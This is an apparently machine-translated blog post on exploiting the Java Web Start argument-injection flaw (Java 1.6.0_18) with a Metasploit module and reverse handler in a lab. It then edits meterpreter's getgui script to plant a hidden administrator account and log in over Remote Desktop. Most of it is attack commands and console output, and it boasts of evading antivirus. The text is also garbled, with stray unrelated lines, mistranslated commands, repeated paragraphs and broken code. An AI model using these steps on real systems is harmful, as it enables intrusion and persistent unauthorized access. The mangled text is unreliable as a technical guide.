Apache Java Web Start Metasploit + Remote Desktop Getgui
Metasploit Another one laboratory. I think this is one of the most dangerous exploit compared to the previous showing, because what i was trying and fails to be detected by AV. The fault lies in the Java Web Start, the binary called javaws.exe, the problem is that the URL validation is minimal so you can make an injection of arbitrary code.
the command line "-XXaltjvm" and interestingly Wednesday, May 12, 2010
How To Know Whenscorpio Man Still Loves You
"-J-XXaltjvm" (see javaws.exe switch-J). This tells Java to load JavaVM alternative library (jvm.dll or libjvm.so) from the desired path. End of game. We can set-XX
altjvm = \\ \\ IP \\ evil, so evil javaw.exe load our jvm.dll. Adios ASLR, DEP .. . "Santamarta said in a statement.
A good paper on the failure is explained in this link
C: \\> sc query WebClient Metasploit
Test utulizaremos failure to demonstrate the popular Metasploit, and exploit called java_ws_arginject_altjvm loaded. Below is the entire script to load the exploit payloads but the things you saw earlier in the previous publications on metasploit:)
# msfconsole
_ _ _
SRVHOST => 192.168.56.1
msf exploit (java_ws_arginject_altjvm)> September
Lhoste Lhoste 192.168.56.1 => 192.168.56.1
msf exploit (java_ws_arginject_altjvm)>
September 3333 lport
lport => 3333 msf exploit
(java_ws_arginject_altjvm )>
[*] Started on 192.168.56.1:3333 reverse handler [*] Using URL: http://192.168.56.1:80/ [*] Server started.
is now only the victim log onto our server started by the MSF with malignant HTML page.
Virtual Machine is an XP SP 3 and Java Version is:
C: \\ Documents and Settings \\ victim 2> java-version
java version "1.6.0_18"
Java (TM) SE Runtime Environment (build 1.6.0_18-b07) Java HotSpot
(TM) Client VM (build 16.0-b13, mixed mode, sharing)
Java update is recommended for a later version, to 1.6.0_20 from
, is where the patch
,
because it is considered
maximum criticality of this vulnerability
.
Of all the exploits I've tried on browser so far, this is one of the most dangerous, since it is independent of the browser, and AV so far (as noted eh), do not have a signature, although I paresca odd ..
REMOTE DESKTOP
When we get a session of meterpreter, we have many features, such as migrating processes, keyloger, screenshot, capture the keys, etc..
The option that we will see, is a script that opens a Terminal Server on the victim machine, but so that we can use them without any problems we will have to modify the code to place a user in the Administrators group
in version English windows. 
Script GETGUI
called to modify where are we going to script files in my case:
/ opt/metasploit3/msf3/scripts/meterpreter
On this route are the meterpreter script.
to line 113 and change this piece of code lang 
Script GETGUI called to modify where are we going to script files in my case:
/ opt/metasploit3/msf3/scripts/meterpreter On this route are the meterpreter script.
As you see, the
getgui
gives us some options where one of them is language, with the-l will pass but there is only type in English and German .
meterpreter>
getgui-h
run Windows Remote Desktop Enabler Meterpreter Script Usage: getgui-u-p Or: getgui-e OPTIONS:
-e Enable RDP only. Forward-f
RDP Connection.
-h Help menu.
-l The language switch
Possible Options 'de_DE', 'en_EN' / default is: 'en_EN'
-p The password of the user to add. -u
The Username of the user to add.
What we do is edit the file getgui.rb
getgui
gives us some options where one of them is language, with the-l will pass but there is only type in English and German .
meterpreter>
getgui-h
run Windows Remote Desktop Enabler Meterpreter Script Usage: getgui-u-p Or: getgui-e OPTIONS:
-e Enable RDP only. Forward-f
RDP Connection.
-h Help menu.
-l The language switch
Possible Options 'de_DE', 'en_EN' / default is: 'en_EN'
-p The password of the user to add. -u
The Username of the user to add.
What we do is edit the file getgui.rb
# nano / opt/metasploit3/msf3/scripts/meterpreter/getgui.rb
we went
case when "en_EN" RDU = "Remote Desktop Users" admin = "Administrators"
when "de_DE"
RDU = "Remotedesktopbenutzer"admin = "Administrator" Once we have changed, now we're at our sessions of meterpreter and run.
end with this one
case lang when "en_EN"
RDU = "Remote Desktop Users" admin = "Administrators" when "de_DE"
RDU = "Remotedesktopbenutzer"admin = "Administrator"
when "en_US"RDU = "Remote Desktop Users" admin end
= "Administrators"
meterpreter > run getgui -u hacker -p 123456 -l es_ES
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com [*] Language set by user to: 'es_ES' [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*]
Adding User: hacker with Password: 123456
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You CAN now login with the user created
What makes this is to create a user with password
hacker
123456
the group "Administrators" and which can be accessed right through the Remote Desktop Users "Remote Desktop Users."
Now to see if it works, go to a shell and the program rdesktop
we connect. (If you got it and you're in distros like debian or aptitude install rdesktop).
$ rdesktop
192.168.56.101
That's all Greetings
REFERENCES
http://blog.metasploit.com/2010/04/ java-web-start-argument-injection.html
http://seclists.org/fulldisclosure/2010/Apr/119
http://www.pentester.es/2010/05/explotando-java- web-start.html http://www.pentester.es/2010/05/vulnerabilidad-en-java-web-start.html
http://threatpost.com/es_la/blogs/nueva- failure-in-java-affects-all-the-versions-of-windows-040 910
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment